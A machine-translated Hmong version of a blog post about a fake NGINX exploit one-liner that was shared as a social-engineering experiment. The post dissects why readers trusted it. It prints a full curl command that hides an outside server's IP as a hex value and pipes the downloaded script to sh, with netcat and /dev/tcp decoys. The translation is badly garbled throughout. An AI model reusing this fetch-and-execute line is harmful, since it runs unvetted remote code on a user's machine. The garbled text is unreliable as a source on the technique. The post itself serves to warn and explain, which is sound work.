Nco tseg. txhais.:
TL; DR: Tsis txhob siv cov raj xa dej hauv sh lossis bash nyob rau txhua qhov xwm txheej. Qhov no yog ib txoj hauv kev zoo kom poob tswj koj lub computer.
Kuv xav qhia rau koj ib zaj dab neeg luv luv txog kev siv PoC comic uas tau tsim rau lub Tsib Hlis 31st. Nws tshwm sim tam sim ntawd teb rau cov xov xwm los ntawm
Tom qab ua tiav kev ua haujlwm ntawm cov txheej txheem obfuscation tshiab hauv curl, kuv tau hais txog qhov qub tweet thiab "tawm ntawm kev ua haujlwm PoC" uas muaj ib kab ntawm cov cai uas xav tias siv cov kev tshawb pom qhov tsis zoo. Tau kawg, qhov no yog qhov tsis muaj tseeb. Kuv xav tias kuv yuav raug nthuav tawm tam sim ntawd, thiab qhov zoo tshaj plaws kuv yuav tau txais ob peb retweets (oh zoo).
Txawm li cas los xij, kuv tsis tuaj yeem xav txog qhov tshwm sim tom ntej. Kuv tweet qhov nrov tshaj plaws. Kuj ceeb tias, thaum lub sijhawm (15:00 Moscow lub sijhawm Lub Rau Hli 1) ob peb tus neeg tau pom tias qhov no yog qhov cuav. Ntau tus neeg retweet nws yam tsis tau kuaj xyuas tag nrho (tso cia ib leeg qhuas cov duab zoo nkauj ASCII nws tawm).
Tsuas saib seb nws zoo nkauj npaum li cas!
Thaum tag nrho cov voj voog thiab cov xim no zoo heev, nws yog qhov tseeb tias tib neeg yuav tsum tau khiav code ntawm lawv lub tshuab kom pom lawv. Luckily, browsers ua hauj lwm ib yam, thiab ua ke nrog qhov tseeb tias kuv tsis xav tau tiag tiag mus rau hauv cov teeb meem kev cai lij choj, cov cai faus rau hauv kuv qhov chaw tsuas yog hu xov tooj xwb tsis tau sim rau nruab lossis ua lwm yam code ntxiv.
Ib qho me me digression:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Socio-electronic engineering (SEE) - ntau tshaj li phishing xwb
Kev nyab xeeb thiab kev paub yog ib feem tseem ceeb ntawm qhov kev sim no. Kuv xav tias lawv yog qhov ua rau nws txoj kev vam meej. Cov kab hais kom ua kom meej meej hais txog kev ruaj ntseg los ntawm kev xa mus rau "127.0.0.1" (tus paub zoo hauv zos). Localhost suav hais tias muaj kev nyab xeeb thiab cov ntaub ntawv ntawm nws yeej tsis tawm hauv koj lub computer.
Kev paub yog qhov tseem ceeb thib ob SEE cov ntsiab lus ntawm qhov kev sim. Txij li thaum lub hom phiaj cov neeg tuaj saib feem ntau yog cov neeg paub txog cov hauv paus ntawm kev ruaj ntseg hauv computer, nws yog ib qho tseem ceeb los tsim cov cai kom cov seem ntawm nws zoo li paub thiab paub (thiab yog li muaj kev nyab xeeb). Kev qiv cov ntsiab lus ntawm cov ntsiab lus siv qub qub thiab sib xyaw ua ke hauv txoj kev txawv txawv tau ua pov thawj tias ua tau zoo heev.
Hauv qab no yog cov ncauj lus kom ntxaws tsom xam ntawm ib-liner. Txhua yam ntawm daim ntawv teev npe no hnav zoo nkauj xwm, thiab xyaum tsis muaj dab tsi yuav tsum tau rau nws txoj haujlwm tiag tiag.
Yam khoom twg tsim nyog tiag tiag? Qhov no -gsS
, -O 0x0238f06a
, |sh
thiab lub web server nws tus kheej. Lub vev xaib server tsis muaj cov lus qhia tsis zoo, tab sis tsuas yog ua haujlwm ASCII cov duab siv cov lus txib echo
nyob rau hauv tsab ntawv muaj nyob rau hauv index.html
. Thaum tus neeg siv nkag mus rau kab nrog |sh
nyob nruab nrab, index.html
loaded thiab tua. Hmoov zoo, cov neeg saib xyuas ntawm lub vev xaib server tsis muaj kev xav phem.
-
../../../%00
- sawv cev mus dhau ntawm phau ntawv; -
ngx_stream_module.so
- txoj hauv kev mus rau qhov random NGINX module; -
/bin/sh%00<'protocol:TCP'
- Peb yog supposedly launching/bin/sh
ntawm lub hom phiaj tshuab thiab redirect cov zis rau TCP channel; -
-O 0x0238f06a#PLToffset
- cov khoom zais cia, ntxiv#PLToffset
, kom zoo li lub cim xeeb offset qee yam muaj nyob hauv PLT; -
|sh;
- lwm yam tseem ceeb. Peb yuav tsum tau redirect cov zis rau sh / bash thiaj li yuav ua tau cov cai los ntawm lub web server uas tawm tsam nyob rau ntawm0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- ib tug dummy uas netcat hais txog/dev/tcp/localhost
kom txhua yam zoo li nyab xeeb dua. Qhov tseeb, nws tsis muaj dab tsi thiab suav nrog hauv kab rau kev zoo nkauj.
Qhov no xaus qhov kev txiav txim siab ntawm ib kab ntawv thiab kev sib tham ntawm "kev sib raug zoo-electronic engineering" (intricate phishing).
Web Server Configuration thiab Countermeasures
Txij li thaum feem coob ntawm kuv cov neeg siv khoom yog infosec / hackers, kuv txiav txim siab ua kom lub vev xaib server me ntsis tiv thaiv cov lus ntawm "nyiam" ntawm lawv, tsuas yog kom cov txiv neej yuav muaj qee yam ua (thiab nws yuav lom zem rau teeb). Kuv yuav tsis sau tag nrho cov pitfalls ntawm no txij li qhov kev sim tseem tab tom ua, tab sis ntawm no yog ob peb yam uas server ua:
- Ua haujlwm saib xyuas kev faib tawm ntawm qee qhov kev sib tham thiab hloov pauv ntau yam saib ua ntej los txhawb tus neeg siv nyem rau ntawm qhov txuas.
- Redirects Chrome/Mozilla/Safari/etc rau Thugcrowd promotional video es tsis txhob qhia cov ntawv plhaub.
- Saib rau OBVIOUS cov cim qhia ntawm kev nkag / blatant hacking, thiab ces pib redirecting thov rau NSA servers (ha!).
- Nruab ib Trojan, nrog rau BIOS rootkit, ntawm txhua lub khoos phis tawj uas cov neeg siv mus ntsib tus tswv tsev los ntawm qhov browser tsis tu ncua (tsuas yog kidding!).
Ib feem me me ntawm antimers
Hauv qhov no, kuv lub hom phiaj nkaus xwb yog ua kom paub qee yam ntawm Apache - tshwj xeeb, cov cai txias rau kev thov rov qab - thiab kuv xav tias: vim li cas ho tsis?
NGINX Exploit (Real!)
Sau npe yuav mus
Tau qhov twg los: www.hab.com